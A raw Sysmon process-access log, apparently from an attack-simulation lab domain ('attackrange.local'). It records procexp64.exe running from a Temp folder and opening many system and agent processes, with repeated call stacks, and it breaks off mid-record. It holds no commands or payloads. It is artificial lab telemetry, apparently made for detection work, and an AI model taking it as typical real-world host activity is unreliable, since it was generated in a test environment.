System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C: